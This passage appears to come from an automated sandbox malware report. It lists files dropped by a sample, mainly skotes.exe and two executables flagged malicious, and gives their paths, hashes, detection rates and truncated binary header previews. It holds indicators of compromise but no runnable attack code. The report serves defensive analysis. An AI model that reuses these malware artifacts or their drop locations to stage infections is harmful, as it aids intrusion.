Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,...... r...........@..........................Pr...... !...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...fawplrfx.....PX.....................@...jtmuhxjq......r......B .............@....taggant.0... r.."...H .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	919552
Entropy (8bit):	6.584664108275496
Encrypted:	false
SSDEEP:	12288:YqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga/T5:YqDEvCTbMWu7rQYlBQcBiT6rprG8ab5
MD5:	40AD6330DCB8BBFDE0F879223B84D0E0
SHA1:	F052A7701C3BC4FF5BC405F040D2D3FB12D3F334
SHA-256:	0385EDDD47FD8CDEEE53F7EB4B98EA30A77EBF4AF33FC309ABE9C2E27764492D
SHA-512:	30D43ACE3D4B659087CB16C2C2737EFFC91AA849824111C54B348363FB77B84DA11FE2FC02C4CBD96ECE2A3CD8AD8E06446424B28E7615813B2B0C4B060496F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...G.(g.........."..........X......w.............@..........................`......7.....@...@.......@.....................d...\|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2795520
Entropy (8bit):	6.5034815375914725
Encrypted:	false
SSDEEP:	49152:1i/08/dJmiQqlmLWdEVefQexKZFuFBSW2Ac0j4:1i/08/dJmivHd4efPKfGMF0
MD5:	178EC03D4F5F0C710E24F5F463993FE5
SHA1:	0B540569E90D9CE9CB94EBDB33B987690A265169
SHA-256:	E3DAB7F190B441CF946F868AF816CCB9CA7BC296F758F2474BCDF879C0684F8A
SHA-512:	442D27F9ED9381B56ADDE9F7DA75432D47E0B1271FCE0B61381C3F719E8B16A0998D5D161F3DE26464B7D98E3F57AE6F1483664C9BD770CEA05D1EBA2286519F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lkuaxvtl.`......H..:..............@...phfhxxut. ....+....................@....taggant.@... +.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1f7736de-20fc-4915-a4e9-8b0766518a09.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\50e96980-30f3-4972-ac78-d8d771ab4544.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3288064
Entropy (8bit):	6.640509311277329
Encrypted:	false
SSDEEP:	49152:9zWk+4IL6xZvHO5SzmD0nM67fmWo1v66/jBNcPExS179sTnuPJ:JW74ZxZvHO5SW0nM67f9gvTjBoKmQYJ
MD5:	4316E6BFA31A0F5639AB60AD32C2F672
SHA1:	CC0A14BD5B282FA1963C11FB3A0CBF576F463357
SHA-256:	28C789C3953A7383EF6D9876E2AAF5BB91393B0BE4B8C8919845A2428920E751
SHA-512:	1B2F69C509FC5B02494B465EAB37AA2FA41BD738BA9CF4B19CDD562FD16EA10C58BBCA56E2C7FFA8DC2052235B8EE6670BF8E1578FAA2F1892BE9F51466014FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................02...........@..........................`2.......2...@.................................W...k...........................(.2...............................2..................................................... . ............................@....rsrc...............................@....idata ............................@...fknmyouv.p+......p+.................@...oavxjruv..... 2.......2.............@....taggant.0...02.."....2.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1872
Entropy (8bit):	5.401868296140863
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrk:8e2Fa116uCntc5toYPM
MD5:	9E669D919179EE46A8CD0D59336B561F
SHA1:	AB784CF70546F250C03C09110106C9E4CB4023F2
SHA-256:	E2E19320351F51EAE6BD024A017859816A59B79413ADA23D1DACBBF97A99C777
SHA-512:	A3E405E59AD6BE80CDE1A6F188039C9695123CD91F4C598C0D99372631409AA43AD772406DFA40E94AFCF982A9853545DD91885D3380F32E9A9D9EAF7EE4C0DE
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 4 15:32:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9780530049004716
Encrypted:	false
SSDEEP:	48:8XodoQTI0RbTH//eidAKZdA19ehwiZUklqehSy+3:8Knb/0Fy
MD5:	AE09C4753CDD7DD9A5C533CEFC3D8A0F
SHA1:	FF13A5F15F1017013446983D241090A3D741C9FC
SHA-256:	519E3E79BBA483BDBC5C3D5A5F68735A0C4EA08833BDF0C327E840F8B891F9C1
SHA-512:	565A15D792362BC1C0A436D1F3F5926720981A7CF312B6DA9D2A150A083BC43E52C17D558D571FDF3C902BAAED0E6C250E70CF195EDE03638C9E190E1DDAA6B3
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....(p1....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VdY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 4 15:32:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9958502309853077
Encrypted:	false
SSDEEP:	48:8sodoQTI0RbTH//eidAKZdA1weh/iZUkAQkqeh1y+2:8rnb/G9QQy
MD5:	050D6CD6E432DD9E2C462D777ECB2631
SHA1:	C7B5D605186E06F04BD5902DBC37946F585BF202
SHA-256:	D558B9D03823AB6BF36762DF6283DDE19A6F51181204FDBC0FA3F1D303BCC0CB
SHA-512:	232C7EC6C6D3A4E89051851D006E1814111D982BEA250C12A491AD74BBFF3210F4DC00B5E9CFB00D471FE1B01E9FCABE04D8088246D59CCC0057300C8BE92FAD
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....].0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VdY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.00751523263961
Encrypted:	false
SSDEEP:	48:8xFodoQTI0RbsH//eidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xwnS/unxy
MD5:	CDA9C654E94BD28B4C902C0E8519AC9D
SHA1:	1CCDCAC96940F8C417AF3CBBB7D8F9F548636167
SHA-256:	C8991EA2671A754139C9500431699632C50B83677F5EB3EDB4F3C59A0FB4B0B5
SHA-512:	08DC6E5ADCDED8447A69E96EE82082FD3B6BFFFDBFBC4651A3C644ED101235ACC3F33384086A2BEAB861FB316003DFCE2496D42B0FA9EC706CA1751E7CC3B1BF
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 4 15:32:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9931352821107455
Encrypted:	false
SSDEEP:	48:8/rodoQTI0RbTH//eidAKZdA1vehDiZUkwqehJy+R:8/unb/Njy
MD5:	EBD135A6BE25DB16B82FAF9CC54CA4B2
SHA1:	C2A7AA39703945A5E26E5C61F1985FF530FFBA39
SHA-256:	424BC7A580F763DA9C663CED1C24D97BB07F032DA5826051C8AA2419CA781DA7
SHA-512:	9F605498F3DE97ADF9F3BEA2C29618AC9F086045A7AC1B074D2BCCB3DE8B50EA8269ADE5DF22F8112AA6F218C94546346B24EBEE1E0C0411B89995EA412E3341
Malicious:	false
Preview:	L..................F.@.. ...$+.,....At{0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VdY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 4 15:32:51 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9807754191988622
Encrypted:	false
SSDEEP:	48:8OodoQTI0RbTH//eidAKZdA1hehBiZUk1W1qehHy+C:8Nnb/N9ny
MD5:	68750B3CB31100B44FD23AB377C04EA1
SHA1:	26A90010A09573C6FDC079E94140A3DDD5451DC7
SHA-256:	D45C1A8A2079A0AFAAF44431DD1A7B41016B6AF460D29BE285AFE7C4F0B31CF2
SHA-512:	46108A00D4AA2C97C3E733A6BE3F0AA3051266A81521970A3312F35097A6C3ECDFBC096BDB072A5B4912E70BBCF95E6F94DA1124E283871BE523DF6E461ABCAB
Malicious:	false
Preview:	L..................F.@.. ...$+.,....t.31....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VdY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 4 15:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9916643021779916
Encrypted:	false
SSDEEP:	48:8IodoQTI0RbTH//eidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8nnb/RT/TbxWOvTbxy7T
MD5:	DDFD8EBA9EDA98491DE0A1B529C4A645
SHA1:	4B6B96AE2C7519760816A1B04B576A8C413C227D
SHA-256:	B8461427B5F9D6C3FC2CD11EC74D74C57E77E468147FD39AEBA84868F649604E
SHA-512:	C8DDE78A7894D126441FD217CD643FC0A294D25E856EBBF411E47D1963C89BBEB5B0FE0C3ED89B20CFDE105A7E56255640F59EE1A8F62E2B9322E20091A4C272
Malicious:	false
Preview:	L..................F.@.. ...$+.,....._(/....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IdY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VdY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VdY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VdY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9814
Entropy (8bit):	5.509351449795665
Encrypted:	false
SSDEEP:	192:nnPOeRnHYbBp6oJ0aX+H6SEXK5kHWNBw8d4Sl:PPeBJUapHEwX0
MD5:	CDA68F1A0739F1C5ED942F5329CEECB8
SHA1:	A50F7ACE722965C20F0FF0A2322E107B8DA4A722
SHA-256:	DDDB0340FDC2B4BC8ED63695EF583E6CF125584BDFC12875BBDDBD5F0C5BD4F4
SHA-512:	E2E44DF8E987F0EE5E8EA59D4FE718F4E57D36BA50997AC7C69328AD07F67235E7695F9F53307795B9A4AF2EF0EB0F3FAF371D3312615532B1AF0D5DFDEB9551
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9814
